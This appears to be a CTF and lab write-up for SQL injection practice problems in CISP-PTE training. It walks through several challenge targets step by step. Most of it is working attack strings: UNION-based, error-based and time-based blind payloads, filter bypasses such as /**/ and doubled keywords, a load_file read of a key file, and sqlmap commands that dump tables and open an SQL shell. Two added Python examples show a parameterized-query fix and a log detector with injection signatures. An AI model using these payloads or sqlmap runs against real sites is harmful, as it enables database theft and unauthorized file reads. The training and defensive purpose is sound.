[CISP-PTE] SQL Injection Practice Problems


1. This Year's Spring Festival Is Different From Previous Years

http://140.210.203.168:28881

1.1 Manual injection

The challenge explicitly states that the comment symbols # and -- are filtered.

  1. Close the single quote, and get around the comment filter
    Closing the quote
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=1

Echoed SQL:

select * from Article where uuid = '983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1'

Closing the quote (since comments are filtered, the payload ends with 1='1 so that the closing quote the application appends completes the expression):

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1

Closure successful
  2. Enumerate the column count
    Try one count at a time

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5 or 1='1
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5,6 or 1='1

With 6 columns the query succeeds, and field 2 is echoed on the page.
  3. Enumerate the database

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,database(),3,4,5,6 or 1='1

The database name is 2web
  4. Enumerate tables

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='2web'),3,4,5,6 or 1='1

Two tables are found: Article, IS_KEY
  5. Enumerate the columns of table IS_KEY

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='2web' and table_name='IS_KEY'),3,4,5,6 and 1='1

The column is haha
  6. Dump the field

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(haha) from IS_KEY),3,4,5,6 and 1='1

Result: key1:abcd1234
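The echoed query above, select * from Article where uuid = '...', shows the root cause: the uuid parameter is concatenated into the SQL text, so a quote in the input ends the string literal and everything after it is parsed as SQL. The following Python script is an added example, not code from the original write-up or from the challenge: it reproduces that query shape against an in-memory SQLite database and places the parameterized version beside it. The Article columns, the IS_KEY row and the payload strings are constructed for the demo, and the tautology is written '1'='1 because SQLite, unlike MySQL, does not compare 1 and '1' as equal.

```python
import sqlite3

# Constructed sample data (assumption): a six-column Article table and the IS_KEY
# table named in the write-up, populated with made-up rows so the demo runs offline.
ARTICLE_UUID = "983fd952-df4e-4b63-946f-f2e6bb0327d6"


def make_db():
    """Build an in-memory SQLite database holding the two tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Article (id INTEGER, uuid TEXT, title TEXT, body TEXT, author TEXT, created TEXT);
        INSERT INTO Article VALUES (1, '%s', 'hello', 'some text', 'alice', '2022-01-01');
        CREATE TABLE IS_KEY (haha TEXT);
        INSERT INTO IS_KEY VALUES ('key1:abcd1234');
        """ % ARTICLE_UUID
    )
    return conn


def lookup_vulnerable(conn, uuid):
    """Same shape as the echoed query: user input is pasted inside the quotes."""
    sql = "select * from Article where uuid = '" + uuid + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, uuid):
    """Parameterized query: the value travels separately from the SQL text, so
    quotes, AND/OR and UNION inside it are data, never SQL."""
    return conn.execute("select * from Article where uuid = ?", (uuid,)).fetchall()


# Payloads in the shape used in the write-up, adapted for SQLite: the trailing
# quote the application appends is absorbed by ending each payload with an
# unterminated string literal instead of a comment.
TAUTOLOGY = ARTICLE_UUID + "' and '1'='1"
UNION_PAYLOAD = "x' union select 1,(select group_concat(haha) from IS_KEY),3,4,5,'6"

if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, TAUTOLOGY))     # the article row still comes back
    print(lookup_vulnerable(conn, UNION_PAYLOAD)) # the IS_KEY value appears in column 2
    print(lookup_safe(conn, UNION_PAYLOAD))       # [] : no row has that literal uuid
```

The concatenating version answers both payloads exactly as the walkthrough describes, with the IS_KEY contents landing in the echoed second column; the parameterized version returns nothing for either, because the whole string is compared as one uuid value.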

1.2 sqlmap injection

  1. Injection
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5
  2. Enumerate the database
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 --current-db
  3. Enumerate tables
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web --tables
  4. Enumerate columns
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY --columns
  5. Dump the field
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY -C "haha" --dump

2. Article Publishing System

http://140.210.203.168:17111/admin.php
sqlmap injection
Enumerate the database

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 --current-db

Enumerate tables

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web --tables

Enumerate columns

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web -T users1 --columns

Dump the field

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web -T users1 -C "XremarkX4354" --dump

3. Article Publishing System 2

sqlmap injection, then running an SQL shell
http://118.195.198.108:20000
Register a user
Publish an article, capture the request and save it as sql.txt
Enumerate the database with sqlmap

python sqlmap.py -r sql.txt --risk 3 --level 5 --current-db

Enumerate tables

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web --tables

Enumerate columns

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 --columns

Dump the fields

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 -C "username,ox3a,password" --dump

The fields could not be dumped this way.
Summary of what has been obtained so far: database 2web, table users1, columns username and password.
Run an SQL shell through sqlmap

python sqlmap.py -r sql.txt --sql-shell
select * from 2web.users1 limit 1
or
select * from 2web.users1 where username='admin'

Alternatively, run the SQL directly through sqlmap:

python sqlmap.py -r sql.txt --sql-query="select * from 2web.users1 limit 1"

4. [Chapter 1: Web Basics] SQL Injection-1

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81
UNION-based injection
Closing the quote

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 #

The # character is filtered.

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 %23
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 --+
%23 and --+ are not filtered; closure successful.

Enumerate the column count

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 30 --+
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 3 --+

The column count is 3.

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' union select 1,2,3 --+

This confirms 3 columns.
Echo position (an id that matches no row makes the page display the union row instead)

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,2,3 --+

Enumerate the database

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,database(),3 --+
The database name is note.

Enumerate tables

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='note'),3 --+

Two tables: fl4g, notes
Enumerate columns

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='note' and table_name='fl4g'),3 --+

The column name is fllllag.

Dump the column value

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(fllllag) from fl4g),3 and 1=1 --+

Flag: n1book{union_select_is_so_cool}

5. sqli-labs 1-15

updatexml / extractvalue

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1

Closing the quote

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1 and 1=1 %23

The # character is filtered.
Error-based injection: enumerate the database

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1) %23

Enumerate tables

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1) %23

The error message only carries one row at a time, so use limit to step through the rows one by one.

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1) %23

emails

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 2,1)),1) %23

uagents

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1)),1) %23

users

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1)),1) %23

referers

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 4,1)),1) %23

Empty, so there are only four tables.
Enumerate columns

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)),1) %23
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1)),1) %23
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1)),1) %23

Three columns: id, username, password
Dump the column contents
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users limit 0,1)),1) %23
XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'

The echoed content is truncated, so the result is incomplete; see the reference document
https://www.wolai.com/ctfhub/qXx5vurg8fRgasaZAVDo8W
The MID() function extracts characters from a text field: SELECT MID(column_name,start[,length]) FROM table_name;

  • Less-1 string-type injection
    http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-1/?id=1' order by 5 --+
  • Less-2 numeric-type injection
    http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-2/?id=1 order by 5
  • Less-3 ') closure
    http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-3/?id=1') --+
  • Less-4 ") closure
    http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-4/?id=1") --+
  • Less-5 error-based injection
    http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(1,database()),1) --+
    http://node2.anna.nssctf.cn:28656/Less-5/?id=1' and updatexml(1,concat(0x7e,(select email_id from emails limit 8,1)),1) --+
  • Less-6 error-based injection, " closure
    http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-6/?id=1" and updatexml(1,concat(0x7e,database()),1)--+
  • Less-7 outfile
    Less-7/?id=-1' union select 1,2,@@datadir -- # get the data storage path
    Less-7/?id=-1' union select 1,2,@@basedir -- # get the installation path
    Less-7/?id=1')) union select 1,2,3 into outfile "C:\phpStudy\WWW\sqli\Less-7\test.txt" -- #
    sqlmap --sql-shell
  • Less-8 boolean-based blind, sqlmap
  • Less-9 time-based blind, sqlmap
    ?id=1' and sleep(5) -- - # 5 s delay
    ?id=1" and sleep(5) -- -
    ?id=1 and sleep(5) -- -
    ?id=1') and sleep(5) -- -
    ?id=1") and sleep(5) -- -
    ?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='i',sleep(3),1)-- -
  • Less-10 time-based blind, sqlmap
    ?id=1" and sleep(5) --+
  • Less-11 error-based injection
    ' and updatexml(1,concat(0x7e,database()),0) #
  • Less-12 closure detection
    ") union select database(),2 #
  • Less-13 closure detection: 1') or 1=1 #
    1') and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
  • Less-14 closure detection: 1" or 1=1 #
    1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

6. Wide-byte injection: [Geek Challenge 2019] HardSQL 1

http://8c4f169a-d2ef-4cdd-bd7f-74431c549dcc.node4.buuoj.cn:81/check.php?username=1&password=1%27or(updatexml(1,concat(0x7e,database()),1))%23

7. SQL file read

http://192.168.213.22:81
Read the file /tmp/360/key through the SQL injection vulnerability; the answer is in that file.
Injection detection

http://192.168.213.22:81/vulnerabilities/fu1.php?id=1'  errors, so an injection point exists; echoed SQL: select * from article where id= ('1'')
Closing the quote
--+ and # are both filtered.
;%00 closes successfully:
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1');%00
Alternatively (spaces are filtered; use /**/ or %0a instead):
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1')/**/or/**/1=('1
Enumerate the column count
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/4;%00
UNION echo
union is filtered; bypass by doubling the keyword, so that removing one copy leaves the other.
http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1')/**/ununionion/**/select/**/1,2,3,4;%00
Read the key file: key:8b3h4a7v
http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1')/**/ununionion/**/select/**/1,2,3,load_file("/tmp/360/key");%00
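Every section above gets past a keyword or character blacklist in the same few ways: %23 and --+ where # and -- are filtered (section 4), /**/ and %0a where spaces are filtered, ;%00 where comments are filtered and a doubled ununionion where union is stripped once (section 7), plus updatexml and sleep probes (section 5). A detector that matches raw request strings misses exactly what those filters missed. The following Python script is an added example, not code from the original write-up or from any of the challenge targets: it URL-decodes each query string, strips inline comments, collapses doubled keywords, and only then applies a few signatures, so that the page's own payload shapes are caught while a benign query containing the word union is not. The log lines, hosts, paths and timestamps are constructed for the demo, and the rule list is a minimal illustration rather than a complete ruleset.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (assumption: combined log format; hosts, paths and
# timestamps are made up). The query strings reuse the evasion shapes from this page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2022:10:00:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2022:10:00:01 +0000] "GET /index.php?id=1'%20and%201=1%20%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2022:10:00:02 +0000] "GET /index.php?id=-1'%20union%20select%201,database(),3%20--+ HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2022:10:00:03 +0000] "GET /vulnerabilities/fu1.php?id=-1')/**/ununionion/**/select/**/1,2,3,load_file(%22/tmp/x%22);%00 HTTP/1.1" 200 700
10.0.0.5 - - [01/Jan/2022:10:00:04 +0000] "GET /Less-9/?id=1'%20and%20sleep(5)%20--%20- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2022:10:00:05 +0000] "GET /Less-1/?id=1'%20and%20updatexml(1,concat(0x7e,database()),1)%20%23 HTTP/1.1" 500 300
10.0.0.7 - - [01/Jan/2022:10:00:06 +0000] "GET /search.php?q=union%20square%20cafe HTTP/1.1" 200 2048
"""

_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Keywords a strip-once filter might remove; the attacker nests a copy inside itself.
_KEYWORDS = ("union", "select", "sleep", "benchmark", "updatexml", "extractvalue", "load_file")

# Signatures applied to the *normalized* query string, not the raw one.
_RULES = [
    ("union-select", re.compile(r"\bunion\b\s+(all\s+)?select\b")),
    ("error-based", re.compile(r"\b(updatexml|extractvalue)\s*\(")),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(")),
    ("file-read", re.compile(r"\bload_file\s*\(")),
    ("comment-terminator", re.compile(r"(#|--[\s-]|--$|;\s*$|\x00)")),
    ("tautology", re.compile(r"\b(and|or)\s+'?(\w+)'?\s*=\s*'?\2'?")),
]


def _collapse_doubled(q):
    """Rewrite every 'keyword nested inside itself' (e.g. ununionion) to the keyword."""
    changed = True
    while changed:
        changed = False
        for kw in _KEYWORDS:
            for i in range(1, len(kw)):
                doubled = kw[:i] + kw + kw[i:]
                if doubled in q:
                    q = q.replace(doubled, kw)
                    changed = True
    return q


def normalize(query):
    """Undo the encodings and padding tricks before any signature is applied."""
    q = unquote_plus(unquote_plus(query))   # decode once, then again for double-encoding; '+' -> ' '
    q = q.lower()
    q = re.sub(r"/\*.*?\*/", " ", q)         # /**/ used in place of spaces
    q = _collapse_doubled(q)                 # ununionion -> union
    q = re.sub(r"[ \t\r\n]+", " ", q)        # fold whitespace; NUL bytes stay visible
    return q


def classify(query):
    """Return the names of the rules that fire on a single query string."""
    norm = normalize(query)
    return [name for name, rx in _RULES if rx.search(norm)]


def scan_log(text):
    """Yield (path, [rule names]) for every request whose query string is flagged."""
    findings = []
    for line in text.splitlines():
        m = _REQUEST.search(line)
        if not m or "?" not in m.group(1):
            continue
        path, query = m.group(1).split("?", 1)
        hits = classify(query)
        if hits:
            findings.append((path, hits))
    return findings


if __name__ == "__main__":
    for path, hits in scan_log(SAMPLE_LOG):
        print(path, "->", ", ".join(hits))
```

Run as a script it prints five flagged requests and stays silent on the plain id=1 request and on the search for "union square cafe". The order of operations matters: comment stripping runs before keyword collapsing so that /**/ padding cannot split a doubled keyword, and the NUL byte from ;%00 is deliberately left in the normalized string so the terminator rule can see it.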